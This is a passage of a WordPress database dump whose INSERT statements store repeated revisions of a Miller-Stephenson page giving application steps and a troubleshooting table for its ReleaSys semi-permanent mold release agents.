seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[ux_product_categories ids="21,16" number="10"]\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li>To learn more about our mold release agents please <a href="https://www.miller-stephenson.com/chemicals/release-agents/">click here.</a></li>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\r\n</ul>\r\n&nbsp;', 'Mold Release Application Guide - Troubleshooting Guide', '', 'inherit', 'closed', 'closed', '', '2694-revision-v1', '', '', '2016-11-07 14:13:44', '2016-11-07 14:13:44', '', 2694, 'https://www.miller-stephenson.com/2694-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2921, 3, '2016-11-07 14:14:27', '2016-11-07 14:14:27', '<div data-canvas-width="370.56179999999995">Miller-Stephenson has generated a mold release application guide to help aid customers with the proper surface preparation and application of its new semi-permanent release agents. Semi-permanent mold release agents are state of the art release agent systems designed to provide superior durability, maximal number of releases per application, and minimal de-molding force. Miller-Stephenson has been at the forefront of developing the most advance release agents for the molding industry.  Our exclusive<strong> <a href="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent-release-agents/">ReleaSys Semi-Permanent release agents</a></strong> represent the most technological advanced and refined release system available on the market. ReleaSys release agents provide greater operational efficiency by bonding to mold surfaces, creating a durable layer that is resistant to both chemical and mechanical attack. These products are offered in both low-odor, non-flammable solvent-based or water-based formulations.  Our product line offers the following benefits:</div>\r\n<div data-canvas-width="370.56179999999995">\r\n<ul style="text-align: justify;">\r\n 	<li>Very low transfer (contamination) to the molded part</li>\r\n 	<li>Excels at releasing difficult substrates from complex mold geometries</li>\r\n 	<li>High suitability for rubber-to-metal bonding</li>\r\n 	<li>Low levels of in-mold build-up/fouling</li>\r\n 	<li>Promotion of substrate flow (Rubber, Epoxy, Polyurethane, etc)</li>\r\n 	<li>Extremely high release-ease</li>\r\n 	<li>Many releases (high durability) between applications</li>\r\n 	<li>Various slip levels</li>\r\n 	<li>Superb release for all polymer types</li>\r\n 	<li>Applicability for all molding processes</li>\r\n</ul>\r\n<p style="text-align: justify;">While semi-permanent mold release agents offer superior performance and efficiency, their surface preparation and application technique have greater requirements. Failure to follow the correct method of preparation and application has a more dramatic effect on performance than other conventional release agents. Therefore proper training and guidance is critical to maximize the effectiveness, to this end Miller-Stephenson has generated a comprehensive mold release application guide and Troubleshooting common molding issues guide to help aid our customers in applying ReleaSys.</p>\r\n<span style="text-decoration: underline; font-size: 115%;"><strong>Surface-Preparation</strong></span>\r\n<p style="text-align: justify;">Semi-permanent mold release agents require specific preparation of the molding surface in order to maximize surface adhesion, durability, and minimize transfer. <strong>The molds must be thoroughly cleaned, removal of all previous mold release agents or contaminates are critical before application of ReleaSys.</strong> Prior to initial application of ReleaSys, Miller-Stephenson recommends mechanical cleaning with media blasting followed by cleaning with a good general purpose solvent or high-pH cleaning solution. Older molds that have significant buildup and/ or molds that have been coated with waxes, oils, etc should be cleaned with a heavy duty cleaner solvent like Miller-Stephenson\'s MS-557 or MS-552.  A good test is to use masking tape and test for surface adhesion, if the tape adheres to the mold surface than typically your cleaning has been successful.</p>\r\n<span style="font-size: 115%;"><strong><span style="text-decoration: underline;">Application to Mold Surface</span></strong></span>\r\n<p style="text-align: justify;">Miller-Stephenson\'s ReleaSys semi-permanents can be applied by three standard methods: hand-wiping, aerosolization via HVLP gun or aerosolization within a can. Miller-Stephenson strongly recommends application via aerosolization.  Aerosolization minimizes over-application and facilitates the development of a uniform, thin film on the molding surface. Miller-Stephenson offers aerosolized cans of its ReleaSys product line (ie: <a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents-2/">ReleaSys 82, 85, 88, and 89</a>) which have been optimized to deliver consistent application and coverage. Our aerosol cans use a 100% nonflammable, quick drying,  and low odor formulation which enables applicators to have greater safety and lower exposure. Follow these steps when applying ReleaSys:</p>\r\n\r\n<ol>\r\n 	<li style="text-align: justify;">Gentle agitate ReleaSys, avoiding high shear / high rpm mixing if using bulk and excessive shaking of the aerosol can. Set HVLP gun to appropriate pressure; a typically starting pressure is &gt;40 psi in the airline, 8-10 psi at the gun, and ~2-4 psi at the outlet. Nozzle sizes can vary between 1.0mm to 1.8mm.  Spray 8-10 inches from the surface with approximately 50% overlap.</li>\r\n 	<li style="text-align: justify;">When using solvent-based ReleaSys allow 2-3 minutes between coats and 15-20 minutes after the final coat to allow for a full cure at room temperature.  Miler-Stephenson recommends 2-3 coats to maximize durability and number or releases. Final cure times can be reduced at elevated temperatures. Water-based formulation should be applied to a hot mold (&gt;90 C) with 2-3 light coats followed by a brief cure time (1-3 minutes at &gt; 90 C). Regardless of applications method or carrier solvent, ReleaSys must be applied to the mold surface as a "wet film or wet coat" and allowed to dry on the surface, failure to do so will dramatically effect performance.\r\n<ul>\r\n 	<li style="text-align: justify;"><em>NOTE: Cure time refers to the time required for the polymeric release agent to sufficiently cross-link and adhere to the mold surface. Allowing proper time for cross-linking is critical to performance, this process can be accelerated as a function of increased temperature.  Typically a single heat cycle of the mold is a sufficient means of acceleration.</em></li>\r\n</ul>\r\n</li>\r\n</ol>\r\n<p style="text-align: justify;"><span style="font-size: 115%;"><strong><span style="text-decoration: underline;">Re-application</span></strong></span></p>\r\n\r\n<ol>\r\n 	<li style="text-align: justify;">When release becomes hesitant, immediately reapply one coat of ReleaSys™ in the same manner as described previously. Spot touch-ups can also be done on known high wear or geometrically strained areas.</li>\r\n 	<li style="text-align: justify;">When molding, it is common for operators to use an HVLP gun to spray the entire mold and apply touch-up coats with the aerosol can.  The aerosol can allows for lighter spray volumes and uniform coverage, particularly in areas that are prone to de-molding issues.</li>\r\n</ol>\r\nFor further assistance please contact our <span style="text-decoration: underline;"><strong><a href="https://www.miller-stephenson.com/tech-support/">Technical Service Department</a></strong></span>. Miller-Stephenson\'s Mold Release Application Guide was designed to set general guidelines for applicators and molders to follow. Each molding operation is different and modifications to the above mentioned process is likely given the diversity and specialization within this field. Please see our Troubleshooting guide below if your are experiencing any issues using our ReleaSys product line.\r\n<p style="text-align: justify;"><span style="text-decoration: underline;"><span style="font-size: 130%;"><strong>Troubleshooting Common Molding Issues</strong></span></span></p>\r\n\r\n<table style="height: 634px;" width="1068">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="241"><span style="text-decoration: underline; font-size: 120%;"><strong>Problem</strong></span></td>\r\n<td style="text-align: center;" width="517"><span style="font-size: 120%;"><span style="text-decoration: underline; color: #ff0000;"><strong>Cause</strong></span></span></td>\r\n<td style="text-align: center;" width="680"><span style="font-size: 120%;"><span style="text-decoration: underline; color: #0000ff;"><strong>Solution</strong></span></span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><strong>Complete failure to obtain release</strong></td>\r\n<td style="text-align: left;"><span style="color: #ed1c24; font-size: 120%;">›</span> Improperly cured ReleaSys</td>\r\n<td>• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><span style="color: #ed1c24; font-size: 120%;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</td>\r\n<td>• Thoroughly clean mold with bead blasting followed by cleaning with a solvent or high pH detergent.  Reapply ReleaSys.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><span style="color: #ed1c24; font-size: 120%;">›</span> Phase-separation of ReleaSys as a result of over    agitation or mixing</td>\r\n<td>• Examine ReleaSys; If separation occurred replace with fresh material</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><strong>Poor Release in strained molding areas</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Lack of slip due to mold geometry application angle</td>\r\n<td>• Apply one or two extra coats of ReleaSys initially; Re-apply touch-up coats to these areas more frequently</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="241"><strong>Good release but build-up of ReleaSys on mold surface.</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="2" width="241"><strong>Good release but parts exhibit blemishes or oily patches</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust  spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Insufficient cure time</td>\r\n<td>• Apply lighter coats of ReleaSys and increase cure time allowed and/or increase cure temperature</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><strong>Inability to achieve multiple releases</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</td>\r\n<td>• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Improper application; non-uniform coverage</td>\r\n<td>• Clean mold; apply light coats of ReleaSys with 50% overlapp between passes.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="241"><strong>Poor release and/or small particles of molding material left on mold surface</strong>.</td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[ux_product_categories ids="21,16" number="10"]\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li>To learn more about our mold release agents please <a href="https://www.miller-stephenson.com/chemicals/release-agents/">click here.</a></li>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\r\n</ul>\r\n&nbsp;', 'Mold Release Application Guide - Troubleshooting Guide', '', 'inherit', 'closed', 'closed', '', '2694-revision-v1', '', '', '2016-11-07 14:14:27', '2016-11-07 14:14:27', '', 2694, 'https://www.miller-stephenson.com/2694-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2922, 3, '2016-11-07 14:18:45', '2016-11-07 14:18:45', '<div data-canvas-width="370.56179999999995">Miller-Stephenson has generated a mold release application guide to help aid customers with the proper surface preparation and application of its new semi-permanent release agents. Semi-permanent mold release agents are state of the art release agent systems designed to provide superior durability, maximal number of releases per application, and minimal de-molding force. Miller-Stephenson has been at the forefront of developing the most advance release agents for the molding industry.  Our exclusive<strong> <a href="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent-release-agents/">ReleaSys Semi-Permanent release agents</a></strong> represent the most technological advanced and refined release system available on the market. ReleaSys release agents provide greater operational efficiency by bonding to mold surfaces, creating a durable layer that is resistant to both chemical and mechanical attack. These products are offered in both low-odor, non-flammable solvent-based or water-based formulations.  Our product line offers the following benefits:</div>\r\n<div data-canvas-width="370.56179999999995">\r\n<ul style="text-align: justify;">\r\n 	<li>Very low transfer (contamination) to the molded part</li>\r\n 	<li>Excels at releasing difficult substrates from complex mold geometries</li>\r\n 	<li>High suitability for rubber-to-metal bonding</li>\r\n 	<li>Low levels of in-mold build-up/fouling</li>\r\n 	<li>Promotion of substrate flow (Rubber, Epoxy, Polyurethane, etc)</li>\r\n 	<li>Extremely high release-ease</li>\r\n 	<li>Many releases (high durability) between applications</li>\r\n 	<li>Various slip levels</li>\r\n 	<li>Superb release for all polymer types</li>\r\n 	<li>Applicability for all molding processes</li>\r\n</ul>\r\n<p style="text-align: justify;">While semi-permanent mold release agents offer superior performance and efficiency, their surface preparation and application technique have greater requirements. Failure to follow the correct method of preparation and application has a more dramatic effect on performance than other conventional release agents. Therefore proper training and guidance is critical to maximize the effectiveness, to this end Miller-Stephenson has generated a comprehensive mold release application guide and Troubleshooting common molding issues guide to help aid our customers in applying ReleaSys.</p>\r\n<span style="text-decoration: underline; font-size: 115%;"><strong>Surface-Preparation</strong></span>\r\n<p style="text-align: justify;">Semi-permanent mold release agents require specific preparation of the molding surface in order to maximize surface adhesion, durability, and minimize transfer. <strong>The molds must be thoroughly cleaned, removal of all previous mold release agents or contaminates are critical before application of ReleaSys.</strong> Prior to initial application of ReleaSys, Miller-Stephenson recommends mechanical cleaning with media blasting followed by cleaning with a good general purpose solvent or high-pH cleaning solution. Older molds that have significant buildup and/ or molds that have been coated with waxes, oils, etc should be cleaned with a heavy duty cleaner solvent like Miller-Stephenson\'s MS-557 or MS-552.  A good test is to use masking tape and test for surface adhesion, if the tape adheres to the mold surface than typically your cleaning has been successful.</p>\r\n<span style="font-size: 115%;"><strong><span style="text-decoration: underline;">Application to Mold Surface</span></strong></span>\r\n<p style="text-align: justify;">Miller-Stephenson\'s ReleaSys semi-permanents can be applied by three standard methods: hand-wiping, aerosolization via HVLP gun or aerosolization within a can. Miller-Stephenson strongly recommends application via aerosolization.  Aerosolization minimizes over-application and facilitates the development of a uniform, thin film on the molding surface. Miller-Stephenson offers aerosolized cans of its ReleaSys product line (ie: <a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents-2/">ReleaSys 82, 85, 88, and 89</a>) which have been optimized to deliver consistent application and coverage. Our aerosol cans use a 100% nonflammable, quick drying,  and low odor formulation which enables applicators to have greater safety and lower exposure. Follow these steps when applying ReleaSys:</p>\r\n\r\n<ol>\r\n 	<li style="text-align: justify;">Gentle agitate ReleaSys, avoiding high shear / high rpm mixing if using bulk and excessive shaking of the aerosol can. Set HVLP gun to appropriate pressure; a typically starting pressure is &gt;40 psi in the airline, 8-10 psi at the gun, and ~2-4 psi at the outlet. Nozzle sizes can vary between 1.0mm to 1.8mm.  Spray 8-10 inches from the surface with approximately 50% overlap.</li>\r\n 	<li style="text-align: justify;">When using solvent-based ReleaSys allow 2-3 minutes between coats and 15-20 minutes after the final coat to allow for a full cure at room temperature.  Miler-Stephenson recommends 2-3 coats to maximize durability and number or releases. Final cure times can be reduced at elevated temperatures. Water-based formulation should be applied to a hot mold (&gt;90 C) with 2-3 light coats followed by a brief cure time (1-3 minutes at &gt; 90 C). Regardless of applications method or carrier solvent, ReleaSys must be applied to the mold surface as a "wet film or wet coat" and allowed to dry on the surface, failure to do so will dramatically effect performance.\r\n<ul>\r\n 	<li style="text-align: justify;"><em>NOTE: Cure time refers to the time required for the polymeric release agent to sufficiently cross-link and adhere to the mold surface. Allowing proper time for cross-linking is critical to performance, this process can be accelerated as a function of increased temperature.  Typically a single heat cycle of the mold is a sufficient means of acceleration.</em></li>\r\n</ul>\r\n</li>\r\n</ol>\r\n<p style="text-align: justify;"><span style="font-size: 115%;"><strong><span style="text-decoration: underline;">Re-application</span></strong></span></p>\r\n\r\n<ol>\r\n 	<li style="text-align: justify;">When release becomes hesitant, immediately reapply one coat of ReleaSys™ in the same manner as described previously. Spot touch-ups can also be done on known high wear or geometrically strained areas.</li>\r\n 	<li style="text-align: justify;">When molding, it is common for operators to use an HVLP gun to spray the entire mold and apply touch-up coats with the aerosol can.  The aerosol can allows for lighter spray volumes and uniform coverage, particularly in areas that are prone to de-molding issues.</li>\r\n</ol>\r\nFor further assistance please contact our <span style="text-decoration: underline;"><strong><a href="https://www.miller-stephenson.com/tech-support/">Technical Service Department</a></strong></span>. Miller-Stephenson\'s Mold Release Application Guide was designed to set general guidelines for applicators and molders to follow. Each molding operation is different and modifications to the above mentioned process is likely given the diversity and specialization within this field. Please see our Troubleshooting guide below if your are experiencing any issues using our ReleaSys product line.\r\n<p style="text-align: justify;"><span style="text-decoration: underline;"><span style="font-size: 130%;"><strong>Troubleshooting Common Molding Issues</strong></span></span></p>\r\n\r\n<table style="height: 634px;" width="1068">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="241"><span style="text-decoration: underline; font-size: 120%;"><strong>Problem</strong></span></td>\r\n<td style="text-align: center;" width="517"><span style="font-size: 120%;"><span style="text-decoration: underline; color: #ff0000;"><strong>Cause</strong></span></span></td>\r\n<td style="text-align: center;" width="680"><span style="font-size: 120%;"><span style="text-decoration: underline; color: #0000ff;"><strong>Solution</strong></span></span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><strong>Complete failure to obtain release</strong></td>\r\n<td style="text-align: left;"><span style="color: #ed1c24; font-size: 120%;">›</span> Improperly cured ReleaSys</td>\r\n<td>• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><span style="color: #ed1c24; font-size: 120%;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</td>\r\n<td>• Thoroughly clean mold with bead blasting followed by cleaning with a solvent or high pH detergent.  Reapply ReleaSys.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><span style="color: #ed1c24; font-size: 120%;">›</span> Phase-separation of ReleaSys as a result of over agitation or mixing</td>\r\n<td>• Examine ReleaSys; If separation occurred replace with fresh material</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><strong>Poor Release in strained molding areas</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Lack of slip due to mold geometry application angle</td>\r\n<td>• Apply one or two extra coats of ReleaSys initially; Re-apply touch-up coats to these areas more frequently</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="241"><strong>Good release but build-up of ReleaSys on mold surface.</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="2" width="241"><strong>Good release but parts exhibit blemishes or oily patches</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust  spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Insufficient cure time</td>\r\n<td>• Apply lighter coats of ReleaSys and increase cure time allowed and/or increase cure temperature</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><strong>Inability to achieve multiple releases</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</td>\r\n<td>• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Improper application; non-uniform coverage</td>\r\n<td>• Clean mold; apply light coats of ReleaSys with 50% overlapp between passes.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="241"><strong>Poor release and/or small particles of molding material left on mold surface</strong>.</td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[ux_product_categories ids="21,16" number="10"]\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li>To learn more about our mold release agents please <a href="https://www.miller-stephenson.com/chemicals/release-agents/">click here.</a></li>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\r\n</ul>\r\n&nbsp;', 'Mold Release Application Guide - Troubleshooting Guide', '', 'inherit', 'closed', 'closed', '', '2694-revision-v1', '', '', '2016-11-07 14:18:45', '2016-11-07 14:18:45', '', 2694, 'https://www.miller-stephenson.com/2694-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2923, 3, '2016-11-07 14:26:54', '2016-11-07 14:26:54', '<div data-canvas-width="370.56179999999995">Miller-Stephenson has generated a mold release application guide to help aid customers with the proper surface preparation and application of its new semi-permanent release agents. Semi-permanent mold release agents are state of the art release agent systems designed to provide superior durability, maximal number of releases per application, and minimal de-molding force. Miller-Stephenson has been at the forefront of developing the most advance release agents for the molding industry.  Our exclusive<strong> <a href="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent-release-agents/">ReleaSys Semi-Permanent release agents</a></strong> represent the most technological advanced and refined release system available on the market. ReleaSys release agents provide greater operational efficiency by bonding to mold surfaces, creating a durable layer that is resistant to both chemical and mechanical attack. These products are offered in both low-odor, non-flammable solvent-based or water-based formulations.  Our product line offers the following benefits:</div>\r\n<div data-canvas-width="370.56179999999995">\r\n<ul style="text-align: justify;">\r\n 	<li>Very low transfer (contamination) to the molded part</li>\r\n 	<li>Excels at releasing difficult substrates from complex mold geometries</li>\r\n 	<li>High suitability for rubber-to-metal bonding</li>\r\n 	<li>Low levels of in-mold build-up/fouling</li>\r\n 	<li>Promotion of substrate flow (Rubber, Epoxy, Polyurethane, etc)</li>\r\n 	<li>Extremely high release-ease</li>\r\n 	<li>Many releases (high durability) between applications</li>\r\n 	<li>Various slip levels</li>\r\n 	<li>Superb release for all polymer types</li>\r\n 	<li>Applicability for all molding processes</li>\r\n</ul>\r\n<p style="text-align: justify;">While semi-permanent mold release agents offer superior performance and efficiency, their surface preparation and application technique have greater requirements. Failure to follow the correct method of preparation and application has a more dramatic effect on performance than other conventional release agents. Therefore proper training and guidance is critical to maximize the effectiveness, to this end Miller-Stephenson has generated a comprehensive mold release application guide and Troubleshooting common molding issues guide to help aid our customers in applying ReleaSys.</p>\r\n<span style="text-decoration: underline; font-size: 115%;"><strong>Surface-Preparation</strong></span>\r\n<p style="text-align: justify;">Semi-permanent mold release agents require specific preparation of the molding surface in order to maximize surface adhesion, durability, and minimize transfer. <strong>The molds must be thoroughly cleaned, removal of all previous mold release agents or contaminates are critical before application of ReleaSys.</strong> Prior to initial application of ReleaSys, Miller-Stephenson recommends mechanical cleaning with media blasting followed by cleaning with a good general purpose solvent or high-pH cleaning solution. Older molds that have significant buildup and/ or molds that have been coated with waxes, oils, etc should be cleaned with a heavy duty cleaner solvent like Miller-Stephenson\'s MS-557 or MS-552.  A good test is to use masking tape and test for surface adhesion, if the tape adheres to the mold surface than typically your cleaning has been successful.</p>\r\n<span style="font-size: 115%;"><strong><span style="text-decoration: underline;">Application to Mold Surface</span></strong></span>\r\n<p style="text-align: justify;">Miller-Stephenson\'s ReleaSys semi-permanents can be applied by three standard methods: hand-wiping, aerosolization via HVLP gun or aerosolization within a can. Miller-Stephenson strongly recommends application via aerosolization.  Aerosolization minimizes over-application and facilitates the development of a uniform, thin film on the molding surface. Miller-Stephenson offers aerosolized cans of its ReleaSys product line (ie: <a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents-2/">ReleaSys 82, 85, 88, and 89</a>) which have been optimized to deliver consistent application and coverage. Our aerosol cans use a 100% nonflammable, quick drying,  and low odor formulation which enables applicators to have greater safety and lower exposure. Follow these steps when applying ReleaSys:</p>\r\n\r\n<ol>\r\n 	<li style="text-align: justify;">Gentle agitate ReleaSys, avoiding high shear / high rpm mixing if using bulk and excessive shaking of the aerosol can. Set HVLP gun to appropriate pressure; a typically starting pressure is &gt;40 psi in the airline, 8-10 psi at the gun, and ~2-4 psi at the outlet. Nozzle sizes can vary between 1.0mm to 1.8mm.  Spray 8-10 inches from the surface with approximately 50% overlap.</li>\r\n 	<li style="text-align: justify;">When using solvent-based ReleaSys allow 2-3 minutes between coats and 15-20 minutes after the final coat to allow for a full cure at room temperature.  Miler-Stephenson recommends 2-3 coats to maximize durability and number or releases. Final cure times can be reduced at elevated temperatures. Water-based formulation should be applied to a hot mold (&gt;90 C) with 2-3 light coats followed by a brief cure time (1-3 minutes at &gt; 90 C). Regardless of applications method or carrier solvent, ReleaSys must be applied to the mold surface as a "wet film or wet coat" and allowed to dry on the surface, failure to do so will dramatically effect performance.\r\n<ul>\r\n 	<li style="text-align: justify;"><em>NOTE: Cure time refers to the time required for the polymeric release agent to sufficiently cross-link and adhere to the mold surface. Allowing proper time for cross-linking is critical to performance, this process can be accelerated as a function of increased temperature.  Typically a single heat cycle of the mold is a sufficient means of acceleration.</em></li>\r\n</ul>\r\n</li>\r\n</ol>\r\n<p style="text-align: justify;"><span style="font-size: 115%;"><strong><span style="text-decoration: underline;">Re-application</span></strong></span></p>\r\n\r\n<ol>\r\n 	<li style="text-align: justify;">When release becomes hesitant, immediately reapply one coat of ReleaSys™ in the same manner as described previously. Spot touch-ups can also be done on known high wear or geometrically strained areas.</li>\r\n 	<li style="text-align: justify;">When molding, it is common for operators to use an HVLP gun to spray the entire mold and apply touch-up coats with the aerosol can.  The aerosol can allows for lighter spray volumes and uniform coverage, particularly in areas that are prone to de-molding issues.</li>\r\n</ol>\r\nFor further assistance please contact our <span style="text-decoration: underline;"><strong><a href="https://www.miller-stephenson.com/tech-support/">Technical Service Department</a></strong></span>. Miller-Stephenson\'s Mold Release Application Guide was designed to set general guidelines for applicators and molders to follow. Each molding operation is different and modifications to the above mentioned process is likely given the diversity and specialization within this field. Please see our Troubleshooting guide below if your are experiencing any issues using our ReleaSys product line.\r\n<p style="text-align: justify;"><span style="text-decoration: underline;"><span style="font-size: 130%;"><strong>Troubleshooting Common Molding Issues</strong></span></span></p>\r\n\r\n<table style="height: 634px;" width="1068">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="241"><span style="text-decoration: underline; font-size: 120%;"><strong>Problem</strong></span></td>\r\n<td style="text-align: center;" width="517"><span style="font-size: 120%;"><span style="text-decoration: underline; color: #ff0000;"><strong>Cause</strong></span></span></td>\r\n<td style="text-align: center;" width="680"><span style="font-size: 120%;"><span style="text-decoration: underline; color: #0000ff;"><strong>Solution</strong></span></span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><span data-text-bg="primary"><strong>Complete failure to obtain release</strong></span></td>\r\n<td style="text-align: left;"><span data-text-bg="primary"><span style="color: #ed1c24; font-size: 120%;">›</span> Improperly cured ReleaSys</span></td>\r\n<td><span data-text-bg="primary">• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><span data-text-bg="primary"><span style="color: #ed1c24; font-size: 120%;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</span></td>\r\n<td><span data-text-bg="primary">• Thoroughly clean mold with bead blasting followed by cleaning with a solvent or high pH detergent.  Reapply ReleaSys.</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><span data-text-bg="primary"><span style="color: #ed1c24; font-size: 120%;">›</span> Phase-separation of ReleaSys as a result of over agitation or mixing</span></td>\r\n<td><span data-text-bg="primary">• Examine ReleaSys; If separation occurred replace with fresh material</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><strong>Poor Release in strained molding areas</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Lack of slip due to mold geometry application angle</td>\r\n<td>• Apply one or two extra coats of ReleaSys initially; Re-apply touch-up coats to these areas more frequently</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="241"><strong>Good release but build-up of ReleaSys on mold surface.</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="2" width="241"><strong>Good release but parts exhibit blemishes or oily patches</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust  spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Insufficient cure time</td>\r\n<td>• Apply lighter coats of ReleaSys and increase cure time allowed and/or increase cure temperature</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><strong>Inability to achieve multiple releases</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</td>\r\n<td>• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Improper application; non-uniform coverage</td>\r\n<td>• Clean mold; apply light coats of ReleaSys with 50% overlapp between passes.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="241"><strong>Poor release and/or small particles of molding material left on mold surface</strong>.</td>\r\n<td><span style="color: #ed1c24; font-size: 